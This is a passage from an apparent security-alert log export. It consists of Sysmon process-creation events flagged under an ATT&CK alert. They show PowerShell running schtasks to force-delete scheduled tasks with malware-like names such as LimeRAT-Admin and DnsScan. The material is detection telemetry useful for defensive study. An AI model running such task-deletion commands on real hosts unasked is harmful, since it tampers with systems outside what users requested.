-Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.927492800Z"",""eventRecordID"":""3979"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.923\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-001042763100}\r\nProcessId: 8076\r\nImage: 
C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.923"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-001042763100}"",""processId"":""8076"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.670",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.889 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010b4743100} +ProcessId: 7060 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.893007100Z"",""eventRecordID"":""3978"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.889\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010b4743100}\r\nProcessId: 7060\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.889"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010b4743100}"",""processId"":""7060"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.654",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.764 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010866b3100} +ProcessId: 608 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.779707300Z"",""eventRecordID"":""3977"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.764\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010866b3100}\r\nProcessId: 608\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:41.764"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010866b3100}"",""processId"":""608"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.638",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.671 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010fd683100} +ProcessId: 7672 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.716446300Z"",""eventRecordID"":""3976"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.671\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010fd683100}\r\nProcessId: 7672\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.671"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010fd683100}"",""processId"":""7672"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.623",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.446 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ec653100} +ProcessId: 7912 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe 
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.549519000Z"",""eventRecordID"":""3975"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.446\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ec653100}\r\nProcessId: 7912\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.446"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010ec653100}"",""processId"":""7912"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.609",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.401 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-00101d643100} +ProcessId: 
868 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.406960300Z"",""eventRecordID"":""3974"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.401\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-00101d643100}\r\nProcessId: 868\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.401"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-00101d643100}"",""processId"":""868"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" 
-Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.602",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.345 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-001002613100} +ProcessId: 5728 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.348118700Z"",""eventRecordID"":""3973"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 